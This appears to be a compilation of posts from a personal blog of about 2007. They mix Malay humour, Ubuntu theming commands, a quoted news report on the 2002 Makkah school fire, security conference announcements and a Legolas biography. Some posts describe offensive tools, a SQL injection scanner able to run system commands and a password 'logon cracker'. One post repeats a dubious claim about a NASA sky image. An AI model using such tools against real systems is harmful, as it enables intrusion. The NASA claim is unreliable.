This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community.

More information here.

Peribajau 2: Angenda' Bunga Ros Ma Langit

Peribajau power ni beb, baru nak di masukkan dalam kamus bahasa Bajau:

"Angenda' Bunga Ros Ma Langit" atau dalam bahasa melayu "Merenung bunga ros di langit"

PeriBajau ni bermaksud insaflah wahai insan, banyak-banyak lah beribadah dan berbuat baik sesama manusia. PeriBajau ini juga biasanya di kuatkan lagi dengan firman dan hadis.


Antara tanda-tanda kiamat, Allah S.W.T berfirman:

"Selain itu sesungguhnya (ngeri) tatkala langit pecah-belah lalu menjadilah mawar merah, berkilat seperti minyak"

Gambar ni di rakam secara tidak sengaja oleh NASA (buat-buat tak sengaja pula), terdapat objek di langit yang pecah dalam beberapa bulan yang lepas dalam akhbar Al-Ahram dan laman web NASA.

Korang janganlah buat kerja-kerja jahat lagi, hentikanlah kerja menggodam-godam dan mengurat awek-awek tu.. tak baik, berhentilah sekarang sebelum korang di berhentikan. Dah sudahlah, aku report nanti kat mak korang, korang tak takut ke mak korang sebat dgn rotan? Sakit beb! Aku dah rasa dulu masa kecik, selalu kena sebat dengan rotan sebab selalu main lumpur. Lagi satu, mak aku selalu cubit kat paha, pergh! besh giler beb, rasa macam nak lagi, bukan apa, awek ni dah tangkap syok kat aku, tapi aku plak yang kena, hehehehe....

PeriBajau

Hidup di Riyadh ni bosan sikit beb. Eh silap, bukan bosan sikit tapi bosan gila tahap Din Beramboi beb. Silap-silap boleh jadi unta padang pasir kalau tak pandai sesuaikan diri. Jadi, aku nak buatlah peribahasa aku sendiri untuk mengisi masa lapang aku selapang padang pasir Saudi ni. Kalau korang tak ada masa lapang, special yang kerja kuat sampai lupa anak bini tu, korang bolehlah ambil seberapa byk masa lapang aku ni.

Kalau tak suka tak apa, sebab peribahasa ni aku cipta ikut suka hati mak bapa Din Beramboi yang sebelah mana aku pun tak tau, tapi seingat aku sebelah tepi kanan sikit, kalau jalan terus sampai lah ke rumah Dato' K, tapi kalau korang jalan belakang aku rasa bolehlah korang jumpa unta-unta padang pasir. So, korang jangan pandai-pandai nak betulkan aku punya istilah peribahasa ni. Istilah peribahasa ni aku bagi nama "PeriBajau".

Aku kenalah bagi nama bahasa ciptaan aku, kalau aku tak bagi nama siapa lagi! Nak tunggu korang bagi nama bukan boleh pakai dan harap langsung. Tapi, aku tau nama tu memang besh... korang tak payahlah nak puji and bodek-bodek aku. Aku dah buat survey dah, 110% yang kata best gila istilah ni, kalau tak percaya korang cuba tanya arwah sebelah rumah korang tu. Tambah lagi peribajau aku ni susah nak create dan develop beb, mau pecah kepala batu Bill Gates di buatnya.

Okay, aku harap korang faham lah kan peribajau ni. Kalau tak faham juga, alamat nak pergi jauh lah tu. Bak kata arwah P. Ramlee, kalau ikut kira-kira, Juma'at ni lah. So, kalau tak faham, buat-buat faham je lah.

PeriBajau aku yang pertama ialah "Mag Parking-parking Ma Padang Pasir". PeriBajau ini bermaksud parking kereta ala-ala unta rehat di padang pasir. Kepada yang tidak pernah tengok unta rehat di padang pasir tu, peribajau ni maksudnya "aku punya suka lah parking macam mana pun, aku yang drive kereta dan korang bolehlah parking jauh sikit ataupun block kereta aku". Contohnya macam dalam gambar ni:


Aku harap korang boleh lah mula guna pakai peribajau ni.

Lastly, aku nak ucap syukran jazila kepada bro Helmi, gambar ni bro Helmi yang tangkap. Tak tau lah dia tangkap macam mana, yang pasti dia takdelah panggil polis macam korang, nak tangkap je panggil polis, nak tangkap je panggil polis, ketinggalan betul! Sekarang ni moden beb... semunya di hujung jari je. Faham-faham jelah kan. So, yang kuku panjang dan hujung jari tak sampai papan menaip tu, cepat-cepatlah potong kuku. Kalau tidak, jangan harap lah nak guna pakai teknologi generasi kita orang ni.

Okaylah, cukup untuk hari ni, aku ada 24 jam setiap hari bukan 25 jam. Jangan lupa komen! komen jeee.. jangan nak pandai-pandai kutuk, aku belasah karang! Dah! Pergi buat baby, banyak cekadak plak! Aku nak tido, besok nak sarapan at Al-Malas Restaurant, pekena teh tarik. Apa nak buat dah takde tempat lain, sekarang ni pun dah mula meleleh kari kat ketiak aku! hehe..

MacOS fans

For some reason I don't like the default compiz that came with Ubuntu, so I removed and install a new one. Of course Ubuntu developer doing a great jobs, it's just about having fun by imitating and finding the limits of Gnome desktop.

slash@shaolinint# apt-get remove compiz
slash@shaolinint# apt-get install compiz compiz-manager

Added this lines to my apt sources.list:

deb http://download.tuxfamily.org/syzygy42/ feisty avant-window-navigator
deb-src http://download.tuxfamily.org/syzygy42/ feisty avant-window-navigator

Download the gpg key and updated the repo.

slash@shaolinint# wget http://download.tuxfamily.org/syzygy42/8434D43A.gpg -O- | pt-key add -
slash@shaolinint# apt-get update

Install the AWN, Tracker and Affinity:

slash@shaolinint# apt-get install avant-window-navigator-svn
slash@shaolinint# apt-get install tracker
slash@shaolinint# apt-get install affinity-svn

Installed Mac fonts, login screen and Macos theme:

macfonts
login screen
themes

Configured my desktop to use Lucida Grande and MacGrande. Finally, I ran the Avant-Window-Navigator and start my compiz from the main menu and preference. That's it! My brand new Ubuntu Feisty MacOS look, sexy just like Jessica Alba :)

Makkah Schoolgirls in Memory

After a year living in Saudi's, I found that Muttawa has a different power. They can do whatever they wants according to their law. Like this one:

In Memory of the lives of 15 Makkah Schoolgirls, lost when their school burnt down on Monday, 11th March, 2002. The Religious Police would not allow them to leave the building, nor allow the Firemen to enter.

"Saudi Arabia's religious police stopped schoolgirls from leaving a blazing building because they were not wearing correct Islamic dress, according to Saudi newspapers.

In a rare criticism of the kingdom's powerful "mutaween" police, the Saudi media has accused them of hindering attempts to save 15 girls who died in the fire on Monday.

About 800 pupils were inside the school in the holy city of Mecca when the tragedy occurred.

According to the al-Eqtisadiah daily, firemen confronted police after they tried to keep the girls inside because they were not wearing the headscarves and abayas (black robes) required by the kingdom's strict interpretation of Islam.

One witness said he saw three policemen "beating young girls to prevent them from leaving the school because they were not wearing the abaya".

The father of one of the dead girls said that the school watchman even refused to open the gates to let the girls out.

"Lives could have been saved had they not been stopped by members of the Commission for Promotion of Virtue and Prevention of Vice," the newspaper concluded.

The religious police are widely feared in Saudi Arabia. They roam the streets enforcing dress codes and sex segregation, and ensuring prayers are performed on time.

Those who refuse to obey their orders are often beaten and sometimes put in jail."

- bbc

Seaweed v1.0

Seaweed, coded in Cocoa Object-C, is a SQL Injection scanner, able to crawl, detect SQL injection vectors, identify the back-end database and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. I'm planning to import few script from perl and python instead of using my own kung-fu :)

Speedstep by Tuxx

SpeedStep is a lightweight cocoa CPU speed stepping application coded by Tuxx, which supports custom set speeds as well as automated speed stepping with threshold adjustment. It is resident in the status bar, allowing the user to monitor and adjust the current speed.

Speedstep customize the speed of CPU, "it helps cpu" when loading and running lot of process. It is nice piece of tools indeed.

Will The Real Open Source CRM Please Stand Up?

I agreed with TaoSecurity post and slashdot article. Michael Tiemann, president of the Open Source Initiative. Essentially he writes:

Enough is enough. Open Source has grown up. Now it is time for us to stand up. I believe that when we do, the vendors who ignore our norms will suddenly recognize that they really do need to make a choice: to label their software correctly and honestly, or to license it with an OSI-approved license that matches their open source label.

I posted same topic in April and of course this is a good news for all Open Source Community.

Demetri Martin

I like jokes!

Cheer me up!

Life is ssssoooooo boring now! So I surfed youtube to cheer myself.

Alizee - Oh La La!

Alizee is one of my favorite singer. Known by her nickname Lili, Alizée started dancing early in her life. By the age of four, she became quite proficient in it. A year later, she enrolled herself in Corsica's renowned dance school, Ecole du Spectacle de Monique Mufraggi, and received her training there till she was 15.

In 1995, at the age of eleven, she won a coloring competition organised by Air Outre Mer, a former French airline now partly acquired by Swissair. Her design won first prize and ended up being reproduced on the cabin of one of the airline's aircraft. The aircraft was subsequently named after her and for her efforts, Alizée won a trip to the Maldives.

In 1999, she appeared on the TV talent show "Graines de Star", broadcast on Métropole. She initially intended to sign up for the programme's dance contest. However, the dance category was reserved for groups only. Alizée therefore participated in the singing category instead, performing the song Ma Prière. She went on to win the "Meilleure Graine" award for most promising young singing star of tomorrow.

Her winning performance was seen by veteran French pop diva Mylène Farmer and Laurent Boutonnat, who were looking for a young, fresh voice to partake in their new project.

Here is one of my favorite video of Alizee live in concert.

Real Open Source

Well, I just get back from dinner with some friends, and usually when I get home I'll do some works, other stuff and reads few my favorites blogs, one of them is Richard Bejtlich blog. I'd like to quote of what he posted today on his blog which is I found very interesting. I hope it will open your eye instead of just keep talking about 'open source' every day. You may visit Richard blogs for the original posted.

- quote -

Open source doesn't just mean access to the source code.

"If you want to call your project Open Source, you have two options.

1. Release your project under an approved license.


2. Create your own license and submit it for approval. If approved, congratulations. You can now use option 1.

Creating your own license and calling it "open source" is not an option. It's not a good marketing tactic either. Any "halo effect" you think you might get from bearing the "open source" label is going to be removed when people realize your project is not really Open Source."

- end of quote -

And yeah, you probably need to read Matasano Blog.

My New Gadget

"i-Mate JasJam -
Sexy and ready for Linux installation? "

Well...... the compatibility is unknown on JasJam version. But it is have been report that JasJar ran Linux but with very limited compatibility. If you have configure and install Linux on this lil sexy phone, feel free to drop me an email at shaolinint@gmail.com.

If you have any idea or recommendation to add some other things to improve the entire experience it would be helpful too.

Anyway, for more information on ARM-Linux project please visit their website here and visit THC-hydra website for the best logon cracker that can run on strongARM architecture.

VNSECURITY CONFERENCE 2007

VNSECON '07 is a non-profit annual security conference organized by VNSECURITY, supported by Department of Technology, Ministry of Public Security and Department of Post and Telecommunication of Ho Chi Minh City.

VNSECON '07 aims to be a very different security conference from the rest of the security conferences in Vietnam in the last few years, which used to come with full of products, vendors advertisements and/or full of boring and less technical talks. We try to organize a conference that gathers the top security experts, from the mainstream network security arena as well as the underground community, to share their researches, discoveries and experiences.

Event Details

Date: 3rd - 4th August, 2007

Location: Conference Center, Phu Tho Indoor Sports Center, Ho Chi Minh City, Vietnam

Happening at the same time and the same location (Exhibition Center, Phu Tho SportsCenter) with VNSECON '07 conference is the Security Exhibition VNSECURITY SHOW 2007, organized by Ministry of Public Security and IET Company. All VNSECON '07 attendees have a free pass to the Exhibition.

Spread it to the world and help the community grows. You can find more information at VNSECURITY website http://conf.vnsecurity.net

Microsoft, Solaris and Linux Programmer

There were three programmers one was working for microsoft, one for solaris and one for linux they met at the toilet:

The one from Microsoft used tons of paper and tons of liquid soap and said:
"Microsoft teaches us that we can use lots of resources that the work to be good"

The one from Solaris used a littel paper and soap and said:
"Solaris teaches us that the resources should be preserved and the performance grows up to 90%"

The one from linux uses no paper and said:
"We the programmers from Linux have learned not to piss on our hands"

HP Pavilion DV9000z

I'm planning to buy a new notebook, HP Pavilion DV9000z. The prize is from USD 949.99 and USD 2,608.94 after I customize to my own specs.
It says it is great for gaming, advanced multimedia and entertainment needs; powered by AMD, Spacious 17" display, full-sized keyboard with numeric kepad, dual hard drive capacity, style and durability with HP Imprint Finish.

The Beauty and The Beast - Microsoft Vista

I called it "The Beauty and The Beast". Why The Beauty? Because Microsoft Vista is the most beautiful Windows ever! and why The Beast? Because Bill Gates owned Microsoft Corporation but not me, hehe.

Anyway, I managed to installed Microsoft Vista on my HP Pavilion DV1000 last night. I must say it is a brand new look for Windows. To me its fast and more light than my Windows XP. But of course I need some hard work to make it more stable. I need to download Intel PRO/Wireless 2200BG latest driver from Intel website, here. I ran Tenable Nessus, Metasploit Framework and other security tools without error.. well at the moment ;).

Security Researcher and Hackers gather in Middle East

KUALA LUMPUR, Malaysia, (15th January 2007) – Hack In The Box (M) Sdn Bhd has announced that for the second time, it will be bringing some of the worlds’ leading network security researchers to the Middle East. HITBSecConf2007 – Dubai will take place at The Sheraton Creek from the 2nd till the 5th of April 2007. This hacking and network security conference will feature over 20 of the world’s leading network security specialists who will be conducting 4 tracks of technical training sessions on the 2nd and 3rd of April. Topics for the training sessions include Advance Web Application Security, Tactical VoIP: Applied VoIPhreaking, Structured Network Threat Analysis and Forensics and Packetmastering the Monkey Way.

This training will then be followed by two days of deep knowledge network security presentations with topics ranging from vulnerability assessment, new attack vectors, defense methodologies, and the latest computer and network security technologies. In addition, there will also be a live hacking competition known popularly as Capture The Flag. The competition is an attack-only game which sees teams or individuals tasked with attacking into prepared servers in order to retrieve marked files or flags on these target machines.

“We are honoured to be able to bring these experts to the Middle East to share their experience and knowledge with the public. This is indeed a rare opportunity for attendees to meet and hear first-hand from some of the leading minds in the field of computer security,” said Dhillon Andrew Kannabhiran, Founder and Chief Executive Officer of Hack In The Box (M) Sdn. Bhd.

Click here for more information.

Legolas Son of King Thranduil

Legolas [LEEG-oh-lahs] is the son of King Thranduil of the Woodland Realm of Northern
Mirkwood, who appears as "the Elvenking" in The Hobbit; his father rules over the Silvan Elves who dwell there. Although he lived among them, was exposed to their customs, and it is inferred that he considered himself one of them, Legolas was strictly not one of the Silvan Elves (Wood-elves). His father Thranduil had originally come from Doriath; he and his son were actually Sindar ("Grey Elves", singular Sinda - "Sindarin" is their language). A small minority of Sindar ruled the predominantly Silvan Woodland Realm, a minority which Thranduil headed. The Sindarin minority in that realm, who should have been more noble and wise than the Silvan Elves, can be seen as having "gone native" at the end of the First Age: after Melkor was defeated and all of the grand Elf-kingdoms of Beleriand were destroyed, they can be seen as going back to "a simpler time" in their culture. The realm of Lothlórien is similar to the Woodland Realm in that a community of Silvan Elves is ruled by non-Silvan ones, i.e. Galadriel and Celeborn.

Though his father and his kingdom appear in The Hobbit, Legolas does not appear himself. Of course, his character had not been made yet (though his name had; see below). However, some have theorized that he may well have fought in the Battle of the Five Armies at Erebor. The events in The Hobbit take place less than a century before the Quest of Mount Doom. Unlike Men, the Eldar (which included the Sindar) reached adulthood on or before they reached a century of age.

Not until the fiftieth year did the Eldar attain the stature and shape in which their lives would afterwards endure, and for some a hundred years would pass before they were full-grown. — from the essay Laws and Customs Among the Eldar, found in Morgoth's Ring, part of The History of Middle-earth.

Legolas is older than Aragorn and Gimli, who are, according to their birth-dates in the Appendices, eighty-seven and one hundred thirty-nine respectively at the time of the War of the Ring; he even calls them "children" (see Age discussion below). Thus, he must have been alive during the events of The Hobbit. Logically, as a retcon he could quite conceivably have been present in his father's halls at the time, and thus may have even fought at Erebor.

He is introduced in The Fellowship of the Ring, at the council of Elrond of Rivendell, where he comes as a messenger from his father to discuss the escape of Gollum from their guard. Tolkien describes him as "a strange Elf, clad in green and brown". Legolas is chosen or volunteers to be one of the members of the Fellowship that sets out to destroy the One Ring. He accompanies the others in their travels from Rivendell to Amon Hen.

When the Fellowship is snowed down while crossing Caradhras, he scouts ahead to find the Sun, while Aragorn and Boromir drive a path through the snow. Unlike them, he is little affected by the blowing winds and snow; he does not even wear boots, only light shoes, and his feet scarcely make imprints on the snow.

After their attempt to cross Caradhras is foiled, their leader Gandalf takes them on an underground journey through Moria, an ancient Dwarf-kingdom, though some (including Legolas) do not wish to go there. Before they reach Moria, however, Legolas helps fend off an attack of Sauron's wolves in Hollin. Once in Moria, he helps fight off the Orcs whom they encounter there, and recognizes Durin's Bane as a Balrog of Morgoth.

After Gandalf is lost while facing the Balrog, Aragorn takes charge of the Fellowship and leads them to the Elven realm of Lothlórien, the Golden Wood. Legolas serves as the initial spokesperson for the company, speaking with the inhabitants, the Galadhrim, whom he considers close kin.

In Lothlórien, Legolas got his elven bow. He used this bow in many great battles.

Within the Fellowship, there is friction between Legolas and the Dwarf Gimli, because of the ancient quarrel between Elves and Dwarves after the destruction of Doriath in the First Age, and also because his father, Thranduil, once threw Gimli's father, Glóin, in prison (as described in The Hobbit). Legolas and Gimli become friends, however, when Gimli greets the Elven queen Galadriel with gentle words.

They take leave of Lothlórien, but not before receiving several gifts. There, he receives a new longbow from the Galadhrim, along with the other gifts that Galadriel and Celeborn give him and the rest of the Fellowship, such as special cloaks and lembas. Legolas later receives a warning from Galadriel (through Gandalf, who returns from death), which he interprets as a sign of his impending death:

"Legolas Greenleaf long under tree
In joy thou hast lived. Beware of the Sea!
If thou hearest the cry of the gull on the shore,
Thy heart shall rest in the forest no more."

While the Fellowship is travelling over the River Anduin, he shoots down a nearby fell beast with one shot.

After Boromir is killed and Meriadoc Brandybuck and Peregrin Took are captured by Orcs in The Two Towers, he, Aragorn and Gimli set forth in pursuit of the two (Frodo Baggins, the Ring-bearer, and his friend Samwise Gamgee had gone ahead on the road to Mordor). They meet the revived Gandalf and the Rohirrim, fight in the Battle of the Hornburg, and witness Saruman's downfall at Isengard, where they are reunited with the two abducted hobbits. In the Battle of the Hornburg, he and Gimli engage in an Orc-slaying contest (Gimli wins by one, killing forty-two to Legolas's forty-one, but the real result is stronger mutual respect).

In The Return of the King, he and Gimli accompany Aragorn on the Paths of the Dead, along with the Grey Company. After Aragorn summons the Dead Men of Dunharrow to fight for him, he watches them scare away the Corsairs of Umbar from their ships at Pelargir. Galadriel's prophecy comes true; as Legolas hears the cries of seagulls, he begins to experience the Sea-longing — the desire to sail west to Valinor, the Blessed Realm, which was latent among the Eldar. He fights in the Battles of the Pelennor Fields and the Morannon, and watches as Sauron is defeated and Barad-dûr collapses.

After the destruction of the One Ring, he stays in Minas Tirith for some time, as Aragorn is crowned King of the Reunited Kingdom as King Elessar and marries his love Arwen. Later, Legolas and Gimli go off travelling together through Fangorn Forest. Eventually, Legolas comes to Ithilien with some of his people, with his father's leave, to spend his remaining time in Middle-earth helping to restore the devastated forests of that war-ravaged land. He founds an Elf-colony in the fair forest of Ithilien in Gondor and becomes its lord.

It is told in the Red Book of Westmarch (first written by Bilbo Baggins, continued by Frodo Baggins and supposedly finished by Samwise Gamgee) that after Aragorn's death in Fourth Age one hundred and twenty, Legolas builds a grey ship in Ithilien, and leaves Middle-earth to go over the Sea to Valinor and Gimli the Dwarf goes with him.